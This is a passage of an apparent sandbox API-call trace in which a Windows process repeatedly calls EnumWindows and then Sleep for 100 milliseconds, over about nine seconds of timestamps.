[0228.209] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0228.211] Sleep (dwMilliseconds=0x64) [0228.228] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0228.229] Sleep (dwMilliseconds=0x64) [0228.259] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0228.261] Sleep (dwMilliseconds=0x64) [0228.301] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0228.302] Sleep (dwMilliseconds=0x64) [0228.337] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0228.338] Sleep (dwMilliseconds=0x64) [0228.344] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0228.346] Sleep (dwMilliseconds=0x64) [0228.381] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0228.382] Sleep (dwMilliseconds=0x64) [0228.419] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0228.422] Sleep (dwMilliseconds=0x64) [0228.425] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0228.426] Sleep (dwMilliseconds=0x64) [0228.460] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0228.500] Sleep (dwMilliseconds=0x64) [0228.509] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0228.510] Sleep (dwMilliseconds=0x64) [0228.539] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0228.540] Sleep (dwMilliseconds=0x64) [0228.577] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0228.579] Sleep (dwMilliseconds=0x64) [0228.591] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0228.592] Sleep (dwMilliseconds=0x64) [0228.618] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0228.619] Sleep (dwMilliseconds=0x64) [0228.655] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0228.655] Sleep (dwMilliseconds=0x64) [0228.665] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0228.666] Sleep (dwMilliseconds=0x64) [0228.693] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0228.694] Sleep (dwMilliseconds=0x64) [0228.731] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0228.732] Sleep (dwMilliseconds=0x64) [0228.738] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0228.738] Sleep (dwMilliseconds=0x64) [0228.773] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0228.774] Sleep (dwMilliseconds=0x64) [0228.801] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0228.801] Sleep (dwMilliseconds=0x64) [0228.811] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0228.813] Sleep (dwMilliseconds=0x64) [0228.848] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0228.849] Sleep (dwMilliseconds=0x64) [0228.864] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0228.865] Sleep (dwMilliseconds=0x64) [0228.889] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0228.890] Sleep (dwMilliseconds=0x64) [0228.934] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0228.935] Sleep (dwMilliseconds=0x64) [0228.940] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0228.941] Sleep (dwMilliseconds=0x64) [0228.975] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0228.976] Sleep (dwMilliseconds=0x64) [0229.014] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0229.015] Sleep (dwMilliseconds=0x64) [0229.026] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0229.028] Sleep (dwMilliseconds=0x64) [0229.055] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0229.056] Sleep (dwMilliseconds=0x64) [0229.095] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0229.096] Sleep (dwMilliseconds=0x64) [0229.178] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0229.179] Sleep (dwMilliseconds=0x64) [0229.228] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0229.269] Sleep (dwMilliseconds=0x64) [0229.288] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0229.289] Sleep (dwMilliseconds=0x64) [0229.311] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0229.312] Sleep (dwMilliseconds=0x64) [0229.349] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0229.350] Sleep (dwMilliseconds=0x64) [0229.381] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0229.382] Sleep (dwMilliseconds=0x64) [0229.391] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0229.392] Sleep (dwMilliseconds=0x64) [0229.431] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0229.432] Sleep (dwMilliseconds=0x64) [0229.470] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0229.471] Sleep (dwMilliseconds=0x64) [0229.474] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0229.474] Sleep (dwMilliseconds=0x64) [0229.511] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0229.513] Sleep (dwMilliseconds=0x64) [0229.550] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0229.551] Sleep (dwMilliseconds=0x64) [0229.562] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0229.563] Sleep (dwMilliseconds=0x64) [0229.653] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0229.660] Sleep (dwMilliseconds=0x64) [0229.751] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0229.753] Sleep (dwMilliseconds=0x64) [0229.771] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0229.772] Sleep (dwMilliseconds=0x64) [0230.816] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0230.817] Sleep (dwMilliseconds=0x64) [0230.892] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0230.893] Sleep (dwMilliseconds=0x64) [0230.932] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0230.933] Sleep (dwMilliseconds=0x64) [0230.957] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0230.960] Sleep (dwMilliseconds=0x64) [0231.002] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0231.002] Sleep (dwMilliseconds=0x64) [0231.038] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0231.039] Sleep (dwMilliseconds=0x64) [0231.041] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0231.041] Sleep (dwMilliseconds=0x64) [0231.076] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0231.077] Sleep (dwMilliseconds=0x64) [0231.155] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0231.156] Sleep (dwMilliseconds=0x64) [0231.163] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0231.201] Sleep (dwMilliseconds=0x64) [0231.236] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0231.237] Sleep (dwMilliseconds=0x64) [0231.253] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0231.254] Sleep (dwMilliseconds=0x64) [0231.286] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0231.288] Sleep (dwMilliseconds=0x64) [0231.326] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0231.327] Sleep (dwMilliseconds=0x64) [0231.356] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0231.357] Sleep (dwMilliseconds=0x64) [0231.366] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0231.368] Sleep (dwMilliseconds=0x64) [0231.417] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0231.418] Sleep (dwMilliseconds=0x64) [0231.453] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0231.454] Sleep (dwMilliseconds=0x64) [0231.456] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0231.457] Sleep (dwMilliseconds=0x64) [0231.460] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0231.460] Sleep (dwMilliseconds=0x64) [0231.497] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0231.499] Sleep (dwMilliseconds=0x64) [0231.537] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0231.538] Sleep (dwMilliseconds=0x64) [0231.545] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0231.545] Sleep (dwMilliseconds=0x64) [0231.549] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0231.549] Sleep (dwMilliseconds=0x64) [0231.579] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0231.580] Sleep (dwMilliseconds=0x64) [0231.620] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0231.621] Sleep (dwMilliseconds=0x64) [0231.628] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0231.629] Sleep (dwMilliseconds=0x64) [0231.662] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0231.663] Sleep (dwMilliseconds=0x64) [0231.703] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0231.704] Sleep (dwMilliseconds=0x64) [0231.720] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0231.721] Sleep (dwMilliseconds=0x64) [0231.744] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0231.745] Sleep (dwMilliseconds=0x64) [0231.797] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0231.799] Sleep (dwMilliseconds=0x64) [0231.827] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0231.828] Sleep (dwMilliseconds=0x64) [0231.856] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0231.857] Sleep (dwMilliseconds=0x64) [0231.894] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0231.895] Sleep (dwMilliseconds=0x64) [0231.916] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0231.918] Sleep (dwMilliseconds=0x64) [0231.934] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0231.935] Sleep (dwMilliseconds=0x64) [0232.046] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0232.047] Sleep (dwMilliseconds=0x64) [0232.077] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0232.079] Sleep (dwMilliseconds=0x64) [0232.182] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0232.183] Sleep (dwMilliseconds=0x64) [0232.222] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0232.225] Sleep (dwMilliseconds=0x64) [0232.243] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0232.244] Sleep (dwMilliseconds=0x64) [0232.270] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0232.272] Sleep (dwMilliseconds=0x64) [0232.308] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0232.309] Sleep (dwMilliseconds=0x64) [0232.327] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0232.328] Sleep (dwMilliseconds=0x64) [0232.350] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0232.351] Sleep (dwMilliseconds=0x64) [0232.387] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0232.388] Sleep (dwMilliseconds=0x64) [0232.406] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0232.407] Sleep (dwMilliseconds=0x64) [0232.428] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0232.429] Sleep (dwMilliseconds=0x64) [0232.466] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0232.467] Sleep (dwMilliseconds=0x64) [0232.483] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0232.484] Sleep (dwMilliseconds=0x64) [0232.505] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0232.506] Sleep (dwMilliseconds=0x64) [0232.544] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0232.545] Sleep (dwMilliseconds=0x64) [0232.560] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0232.561] Sleep (dwMilliseconds=0x64) [0232.582] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0232.584] Sleep (dwMilliseconds=0x64) [0232.621] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0232.622] Sleep (dwMilliseconds=0x64) [0232.633] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0232.634] Sleep (dwMilliseconds=0x64) [0232.661] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0232.663] Sleep (dwMilliseconds=0x64) [0232.703] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0232.705] Sleep (dwMilliseconds=0x64) [0232.711] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0232.711] Sleep (dwMilliseconds=0x64) [0232.744] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0232.745] Sleep (dwMilliseconds=0x64) [0232.787] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0232.790] Sleep (dwMilliseconds=0x64) [0232.792] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0232.792] Sleep (dwMilliseconds=0x64) [0232.829] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0232.830] Sleep (dwMilliseconds=0x64) [0232.862] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0232.863] Sleep (dwMilliseconds=0x64) [0232.876] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0232.878] Sleep (dwMilliseconds=0x64) [0232.915] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0232.916] Sleep (dwMilliseconds=0x64) [0232.951] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0232.951] Sleep (dwMilliseconds=0x64) [0232.957] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0232.958] Sleep (dwMilliseconds=0x64) [0232.994] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0232.995] Sleep (dwMilliseconds=0x64) [0233.030] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0233.031] Sleep (dwMilliseconds=0x64) [0233.033] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0233.034] Sleep (dwMilliseconds=0x64) [0233.073] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0233.074] Sleep (dwMilliseconds=0x64) [0233.180] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0233.182] Sleep (dwMilliseconds=0x64) [0233.194] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0233.195] Sleep (dwMilliseconds=0x64) [0233.225] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0233.226] Sleep (dwMilliseconds=0x64) [0233.265] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0233.266] Sleep (dwMilliseconds=0x64) [0233.288] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0233.289] Sleep (dwMilliseconds=0x64) [0233.324] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0233.325] Sleep (dwMilliseconds=0x64) [0233.365] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0233.367] Sleep (dwMilliseconds=0x64) [0233.398] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0233.399] Sleep (dwMilliseconds=0x64) [0233.409] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0233.410] Sleep (dwMilliseconds=0x64) [0233.450] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0233.451] Sleep (dwMilliseconds=0x64) [0233.481] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0233.482] Sleep (dwMilliseconds=0x64) [0233.491] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0233.492] Sleep (dwMilliseconds=0x64) [0233.532] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0233.533] Sleep (dwMilliseconds=0x64) [0233.574] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0233.575] Sleep (dwMilliseconds=0x64) [0233.611] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0233.615] Sleep (dwMilliseconds=0x64) [0233.662] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0233.664] Sleep (dwMilliseconds=0x64) [0233.671] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0233.673] Sleep (dwMilliseconds=0x64) [0233.715] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0233.716] Sleep (dwMilliseconds=0x64) [0233.753] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0233.765] Sleep (dwMilliseconds=0x64) [0233.779] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0233.783] Sleep (dwMilliseconds=0x64) [0233.810] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0233.811] Sleep (dwMilliseconds=0x64) [0233.858] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0233.859] Sleep (dwMilliseconds=0x64) [0233.877] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0233.878] Sleep (dwMilliseconds=0x64) [0233.904] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0233.905] Sleep (dwMilliseconds=0x64) [0233.941] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0233.943] Sleep (dwMilliseconds=0x64) [0233.952] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0233.953] Sleep (dwMilliseconds=0x64) [0233.986] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0233.987] Sleep (dwMilliseconds=0x64) [0234.025] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0234.026] Sleep (dwMilliseconds=0x64) [0234.034] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0234.034] Sleep (dwMilliseconds=0x64) [0234.068] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0234.069] Sleep (dwMilliseconds=0x64) [0234.140] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0234.141] Sleep (dwMilliseconds=0x64) [0234.158] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0234.159] Sleep (dwMilliseconds=0x64) [0234.186] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0234.187] Sleep (dwMilliseconds=0x64) [0234.233] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0234.235] Sleep (dwMilliseconds=0x64) [0234.246] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0234.247] Sleep (dwMilliseconds=0x64) [0234.275] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0234.276] Sleep (dwMilliseconds=0x64) [0234.325] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0234.327] Sleep (dwMilliseconds=0x64) [0234.389] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0234.390] Sleep (dwMilliseconds=0x64) [0234.427] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0234.428] Sleep (dwMilliseconds=0x64) [0234.438] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0234.439] Sleep (dwMilliseconds=0x64) [0234.467] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0234.468] Sleep (dwMilliseconds=0x64) [0234.506] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0234.507] Sleep (dwMilliseconds=0x64) [0234.515] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0234.516] Sleep (dwMilliseconds=0x64) [0234.546] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0234.547] Sleep (dwMilliseconds=0x64) [0234.587] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0234.589] Sleep (dwMilliseconds=0x64) [0234.598] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0234.599] Sleep (dwMilliseconds=0x64) [0234.629] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0234.630] Sleep (dwMilliseconds=0x64) [0234.680] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0234.681] Sleep (dwMilliseconds=0x64) [0234.699] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0234.700] Sleep (dwMilliseconds=0x64) [0234.722] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0234.723] Sleep (dwMilliseconds=0x64) [0234.772] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0234.773] Sleep (dwMilliseconds=0x64) [0234.796] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0234.797] Sleep (dwMilliseconds=0x64) [0234.815] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0234.816] Sleep (dwMilliseconds=0x64) [0234.854] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0234.855] Sleep (dwMilliseconds=0x64) [0234.869] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0234.870] Sleep (dwMilliseconds=0x64) [0234.900] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0234.901] Sleep (dwMilliseconds=0x64) [0234.938] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0234.939] Sleep (dwMilliseconds=0x64) [0234.944] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0234.945] Sleep (dwMilliseconds=0x64) [0234.978] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0234.979] Sleep (dwMilliseconds=0x64) [0235.008] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0235.009] Sleep (dwMilliseconds=0x64) [0235.017] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0235.018] Sleep (dwMilliseconds=0x64) [0235.053] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0235.054] Sleep (dwMilliseconds=0x64) [0235.127] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0235.129] Sleep (dwMilliseconds=0x64) [0235.140] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0235.141] Sleep (dwMilliseconds=0x64) [0235.178] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0235.179] Sleep (dwMilliseconds=0x64) [0235.216] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0235.217] Sleep (dwMilliseconds=0x64) [0235.219] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0235.220] Sleep (dwMilliseconds=0x64) [0235.253] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0235.255] Sleep (dwMilliseconds=0x64) [0235.296] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0235.297] Sleep (dwMilliseconds=0x64) [0235.307] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0235.308] Sleep (dwMilliseconds=0x64) [0235.335] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0235.336] Sleep (dwMilliseconds=0x64) [0235.376] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0235.377] Sleep (dwMilliseconds=0x64) [0235.379] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0235.379] Sleep (dwMilliseconds=0x64) [0235.414] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0235.415] Sleep (dwMilliseconds=0x64) [0235.439] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0235.440] Sleep (dwMilliseconds=0x64) [0235.453] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0235.453] Sleep (dwMilliseconds=0x64) [0235.489] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0235.490] Sleep (dwMilliseconds=0x64) [0235.508] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0235.509] Sleep (dwMilliseconds=0x64) [0235.530] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0235.531] Sleep (dwMilliseconds=0x64) [0235.606] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0235.608] Sleep (dwMilliseconds=0x64) [0235.697] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0235.700] Sleep (dwMilliseconds=0x64) [0235.711] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0235.712] Sleep (dwMilliseconds=0x64) [0235.748] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0235.750] Sleep (dwMilliseconds=0x64) [0235.796] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0235.797] Sleep (dwMilliseconds=0x64) [0235.800] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0235.801] Sleep (dwMilliseconds=0x64) [0235.844] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0235.845] Sleep (dwMilliseconds=0x64) [0235.929] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0235.930] Sleep (dwMilliseconds=0x64) [0235.936] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0235.947] Sleep (dwMilliseconds=0x64) [0235.978] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0235.979] Sleep (dwMilliseconds=0x64) [0236.016] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0236.017] Sleep (dwMilliseconds=0x64) [0236.031] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0236.032] Sleep (dwMilliseconds=0x64) [0236.034] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0236.035] Sleep (dwMilliseconds=0x64) [0236.058] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0236.060] Sleep (dwMilliseconds=0x64) [0236.152] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0236.153] Sleep (dwMilliseconds=0x64) [0236.176] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0236.177] Sleep (dwMilliseconds=0x64) [0236.194] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0236.196] Sleep (dwMilliseconds=0x64) [0236.236] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0236.237] Sleep (dwMilliseconds=0x64) [0236.282] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0236.283] Sleep (dwMilliseconds=0x64) [0236.285] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0236.285] Sleep (dwMilliseconds=0x64) [0236.324] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0236.327] Sleep (dwMilliseconds=0x64) [0236.367] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0236.368] Sleep (dwMilliseconds=0x64) [0236.377] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0236.378] Sleep (dwMilliseconds=0x64) [0236.407] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0236.408] Sleep (dwMilliseconds=0x64) [0236.444] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0236.445] Sleep (dwMilliseconds=0x64) [0236.469] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0236.469] Sleep (dwMilliseconds=0x64) [0236.486] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0236.488] Sleep (dwMilliseconds=0x64) [0236.523] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0236.525] Sleep (dwMilliseconds=0x64) [0236.563] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0236.565] Sleep (dwMilliseconds=0x64) [0236.601] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0236.602] Sleep (dwMilliseconds=0x64) [0236.636] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0236.637] Sleep (dwMilliseconds=0x64) [0236.640] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0236.643] Sleep (dwMilliseconds=0x64) [0236.680] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0236.681] Sleep (dwMilliseconds=0x64) [0236.714] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0236.715] Sleep (dwMilliseconds=0x64) [0236.722] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0236.723] Sleep (dwMilliseconds=0x64) [0236.859] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0236.861] Sleep (dwMilliseconds=0x64) [0236.894] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0236.895] Sleep (dwMilliseconds=0x64) [0236.900] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0236.901] Sleep (dwMilliseconds=0x64) [0236.936] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0236.937] Sleep (dwMilliseconds=0x64) [0236.972] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0236.973] Sleep (dwMilliseconds=0x64) [0236.987] EnumWindows (lpEnumFunc=0x423dd0, lParam=0x410000) [0236.989] Sleep 